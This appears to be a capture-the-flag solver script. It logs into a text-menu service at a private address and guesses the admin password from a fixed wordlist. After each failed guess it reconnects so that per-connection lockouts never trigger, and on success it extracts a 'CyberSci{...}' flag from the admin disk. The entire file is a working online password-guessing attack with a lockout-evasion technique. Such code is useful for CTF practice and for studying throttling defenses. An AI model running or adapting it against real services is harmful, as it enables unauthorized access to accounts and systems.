#!/usr/bin/env python3
import socket
import time
import sys

def interact(host, port):
    """Walk the service's text menu and try a fixed list of admin passwords.

    The session is driven purely by timing: after each send the code sleeps
    and performs a single ``recv``, so a reply split across TCP segments is
    only partially seen and the marker checks below may miss it.

    After every rejected guess the connection is closed and a new one is
    opened, so the service sees one guess per TCP connection. A lockout
    that counts failures per connection would therefore never trigger;
    throttling has to key on the source address or the account.

    Args:
        host: Address of the service.
        port: TCP port of the service.

    Returns:
        True if a reply contained one of the success markers (the admin
        disk content is then requested and printed), otherwise False,
        including on timeout or any other exception.
    """
    import re
    import traceback

    def open_socket():
        # Every socket used here gets the same 10 second timeout.
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        return sock

    def read_reply(sock, size=4096, wait=0.5):
        # Fixed pause, then one recv; undecodable bytes are dropped.
        time.sleep(wait)
        return sock.recv(size).decode('utf-8', errors='ignore')

    granted_markers = ('ACCESS GRANTED', 'SUCCESS', 'Administrator privileges')
    denied_markers = ('DENIED', 'Incorrect')
    candidates = (
        'rust',
        'rustinpeace',
        'RUST',
        'peace',
        'megadeth',
        'archivist',
        '2087',
        'admin',
        'password',
        'r',
        'u',
        's',
        't',
    )

    conn = open_socket()
    try:
        print(f"[*] Connecting to {host}:{port}...")
        conn.connect((host, port))

        # Banner / main menu.
        print(read_reply(conn, wait=1))

        # Menu entry 4 is the admin login prompt.
        print("\n[*] Selecting option 4 (ADMIN LOGIN)...")
        conn.sendall(b'4\n')
        print(read_reply(conn))

        for guess in candidates:
            print(f"\n[*] Trying password: '{guess}'")
            conn.sendall((guess + '\n').encode())
            reply = read_reply(conn)
            print(reply)

            if any(marker in reply for marker in granted_markers):
                print(f"\n[+] SUCCESS! Password is: {guess}")

                # Logged in: load disk -> select ADMIN disk -> view content.
                time.sleep(1)
                conn.sendall(b'1\n')
                print(read_reply(conn))

                conn.sendall(b'4\n')
                print(read_reply(conn))

                conn.sendall(b'1\n')
                disk = read_reply(conn, size=8192, wait=1)
                print("\n[+] ADMIN DISK CONTENT:")
                print(disk)

                # Pull the flag token out of the disk listing, if present.
                if 'CyberSci{' in disk:
                    found = re.search(r'CyberSci\{[^}]+\}', disk)
                    if found:
                        print(f"\n[+] FLAG FOUND: {found.group()}")

                return True

            if any(marker in reply for marker in denied_markers):
                print("[-] Password incorrect, trying next...")
                # Fresh connection for the next guess, then discard the
                # banner and the login prompt without printing them.
                conn.close()
                conn = open_socket()
                conn.connect((host, port))
                time.sleep(1)
                conn.recv(4096)
                conn.sendall(b'4\n')
                time.sleep(0.5)
                conn.recv(4096)
                continue

            # Neither marker set matched; the same connection is reused
            # for the next guess without resynchronising the menu state.
            print("[?] Unexpected response")

        print("\n[-] All passwords failed")
        return False

    except socket.timeout:
        print("[!] Connection timed out")
        return False
    except Exception as e:
        print(f"[!] Error: {e}")
        traceback.print_exc()
        return False
    finally:
        # Closes whichever socket is current (original or a reconnect).
        conn.close()

if __name__ == "__main__":
    # Target address and port are fixed in the script; no arguments are read.
    target_host, target_port = '10.0.2.31', 7000
    interact(target_host, target_port)
